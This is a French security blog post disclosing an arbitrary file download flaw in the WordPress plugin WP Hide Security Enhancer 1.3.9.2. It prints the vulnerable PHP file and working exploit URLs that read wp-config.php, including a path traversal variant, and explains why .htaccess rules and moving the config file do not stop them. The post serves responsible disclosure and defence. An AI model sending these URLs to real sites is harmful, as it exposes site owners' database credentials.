Arbitrary File Download Vulnerability dans WP Hide Security Enhancer 1.3.9.2

WP Hide Security Enhancer est une extension de sécurité qui cache une installation WordPress. Elle a été développée par NSP Code. Le 15 février 2017, l’auteur du plugin a été alerté et les correctifs ont été publiés rapidement, merci à lui.

Faille critique

WP Hide Security Enhancer en version 1.3.9.2 ou moins est victime d’une vulnérabilité de type Arbitrary File Download. Elle permet à un visiteur de télécharger n’importe quel fichier de votre installation. Comme vous le devinez, c’est une faille critique.

Comment ça marche ?

Malheureusement c’est très simple à exploiter :

Dans le dossier /router/ vous trouverez le fichier file-process.php.

<?php

    error_reporting(0);
    
    $action     =   isset($_GET['action'])      ?   $_GET['action']     :   '';
    $file_path  =   isset($_GET['file_path'])   ?   $_GET['file_path']  :   '';
    
    if(empty($action)   ||  empty($file_path))
        die();
        
    //append doc root to path 
    $file_path  =   $_SERVER["DOCUMENT_ROOT"] .   $file_path;  
    
    //check if file exists
    if (!file_exists($file_path))
        die();
        
    $WPH_FileProcess  =   new WPH_FileProcess();
    
    $WPH_FileProcess->action        =   $action;
    $WPH_FileProcess->file_path     =   $file_path;
    
    $WPH_FileProcess->run();    

    class WPH_FileProcess
        {
            var $action;
            var $file_path;
            
            function __construct()
                {
                    ob_start("ob_gzhandler");
                }
            
            function __destruct()
                {
                    $out = ob_get_contents();
                    ob_end_clean();
                    
                    echo $out;
                }
                
            function run()
                {
                    switch($this->action)
                        {
                            case 'style-clean'  :   
                                                    $this->style_clean();
                                                    break;
                            
                        }
                }
                
                
            function style_clean()
                {
                    //output headers
                    $expires_offset = 31536000;                    
                    
                    header('Content-Type: text/css; charset=UTF-8');
                    header('Expires: ' . gmdate( "D, d M Y H:i:s", time() + $expires_offset ) . ' GMT');
                    header("Cache-Control: public, max-age=$expires_offset");
                    header('Last-Modified: '.gmdate('D, d M Y H:i:s', filemtime($this->file_path)).' GMT', true);
                    
                    $handle         = fopen($this->file_path, "r");
                    $file_data      = fread($handle, filesize($this->file_path));
                    fclose($handle);
                    
                    $file_data  =   preg_replace('!/\*.*?\*/!s', '', $file_data);
                    $file_data  =   preg_replace("/(^[\r\n]*|[\r\n]+)[\s\t]*[\r\n]+/", "\n", $file_data);
                    
                    echo $file_data;
                    
                }
        }


?>

Ce fichier n’est pas inclus dans WordPress donc il n’y a pas de moyen pour un plugin de sécurité WordPress d’attraper ça. Vous avez besoin d’un Web Application Firewall pour y arriver.

Mais arriver à quoi ? Tout ce qu’un attaquant a besoin c’est 2 paramètres dans l’URL comme demandé en ligne 8 :

http://example.com/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=…&file_path=…

Maintenant, la ligne 15 attends un fichier existant. Un attaquant connait un fichier qui existe et qui est interessant pour lui, il s’agit dewp-config.php.

http://example.com/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=…&file_path=/wp-config.php

Encore, la ligne 47 attends une action nommée style-clean aussi simple que ça.

http://example.com/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php

On y va, cette URL sera utilisée par un pirate pour afficher à l’écran le contenu de ce fichier.

Une démo en local sur le fichier wp-config.php

Suis-je protégé?

Vous avez peut-être ajouté des scripts pour “protéger votre fichier wp-config.php“. Je suis au regret de vous dire que cela ne fonctionne PAS comme ça.

.htaccess

Vous avez surement déjà lu qu’on peut ajouter des règles dans le fichier .htaccess pour le protéger le fichier de config, des règles comme ça :

<files wp-config.php>
order allow,deny
deny from all
</files>

Cela ne vous protège PAS de cette vulnérabilité. Pourquoi ? Car cette protection n’interdit que l’accès direct au fichier via un navigateur, mais pas depuis un script PHP, chose qui est ici utilisé.

Remontez le

Vous avez aussi surement lu qu’on pouvait remonter d’un cran dans l’arborescence le fichier wp-config.php, comme ça il n’est plus accessible depuis votre URL en front-office. Oui c’est vrai, mais c’est tout. Un script PHP peut toujours y accéder :

http://example.com/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/../wp-config.php

Comment rester en sécurité avec ce genre de faille ?

Il arrive souvent que des failles donnent un accès au fichier wp-config.php pour ceux qui se souviennent en 2014 avec revslider. C’était exactement la même chose.

Vous vous devez de bloquer certains mots dans vos URLs, en effet, ni WordPress, ni vous, ni un utilisateur, ni un client n’a besoin de toucher à ce nom de fichier.

Si vous avez SecuPress Pro, vous êtes déjà protégé(e) de ce genre d’attaques.

À propos de Julio Potier Tous les articles de Julio Potier

Créateur de SecuPress et de la Formation LearnWPSecurity, Julio est aussi organisateur du WordCamp Lille.
Orateur compulsif, formateur sénior et ingénieur WordPress, il s’est spécialisé dans la sécurité depuis 2002 et contribue à WordPress sous diverses formes.